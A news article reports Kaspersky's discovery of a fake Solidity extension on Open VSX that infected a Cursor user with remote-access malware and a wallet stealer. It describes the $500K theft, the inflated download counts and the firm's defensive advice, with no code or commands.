Crypto Gone Cursor: Kaspersky Finds $500K Heist Hidden in Phony Code Extension

Kaspersky researchers have uncovered a sophisticated crypto heist that siphoned off $500,000 worth of digital assets by luring developers into downloading a malicious Visual Studio Code extension masquerading as a Solidity tool.

The cybersecurity firm’s Global Research and Analysis Team (GReAT) revealed that the attack targeted Cursor, a development environment built on top of the popular VS Code platform, which incorporates AI-assisted coding features.

The perpetrators exploited the Open VSX extension repository, uploading fraudulent packages that claimed to support Solidity, the primary language used in Ethereum smart contract development.

Instead of providing any real development functionality, the malicious extensions quietly downloaded ScreenConnect—a legitimate remote access tool often abused in cyberattacks—to give threat actors full control of the victim’s machine.

According to Kaspersky, the scam came to light after a Russian blockchain developer reached out for help during an incident response.

The developer had unknowingly installed one of the trojanized packages, which ultimately allowed hackers to gain access to his crypto wallets and drain half a million dollars in assets.

The attackers cleverly gamed the Open VSX ranking system by artificially inflating the download count of their malicious package, which reached over 54,000 installs at the time of the theft.

The higher ranking tricked developers into choosing the compromised extension over the legitimate one, despite its lack of documentation and real functionality.

Once the malware was installed, it deployed the Quasar backdoor and a stealer program capable of exfiltrating data from browsers, email clients, and crypto wallets—including highly sensitive seed phrases.

Even after Kaspersky helped remove the malicious package from the repository, the attackers returned, reposting it with an even more inflated download count—this time exceeding 2 million installs, compared to the original package’s 61,000.

“This attack highlights how even skilled developers working in the blockchain space can fall victim to deceptively crafted malware,” said Georgy Kucherin, a researcher with Kaspersky GReAT.

Kaspersky noted that the same group behind the fake Solidity extension also released a malicious NPM package named “solsafe” and other fraudulent VS Code extensions including “solaibot,” “among-eth,” and the oddly named “blankebesxstnion.”

All of these extensions followed a similar attack pattern and have since been removed from their respective repositories.

Experts warn that the open-source ecosystem is increasingly vulnerable to manipulation, particularly as developers rely more heavily on public code libraries and community tools.

Kaspersky emphasized that spotting compromised open-source packages with the naked eye is no longer feasible, even for seasoned programmers.

To mitigate such risks, the firm recommends using monitoring solutions to flag threats in open-source components and regularly conducting compromise assessments to detect intrusions early.

They also advise verifying the credibility of package maintainers by checking for detailed documentation, regular updates, and an active history of issue tracking.

Staying informed on emerging threats through security advisories and bulletins is also critical in a rapidly evolving threat landscape.

While the attack is alarming, it’s far from an isolated incident in the crypto development world, where everything from browser plug-ins to Discord channels have become hotspots for social engineering and digital heists.

As the lines between development tools and attack vectors continue to blur, the golden rule for coders may now be: trust, but verify—then verify again.

For now, it seems the only thing more volatile than crypto prices is the extension marketplace meant to support them.

Comments

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Discover more from TBC News

Subscribe now to keep reading and get access to the full archive.

Continue reading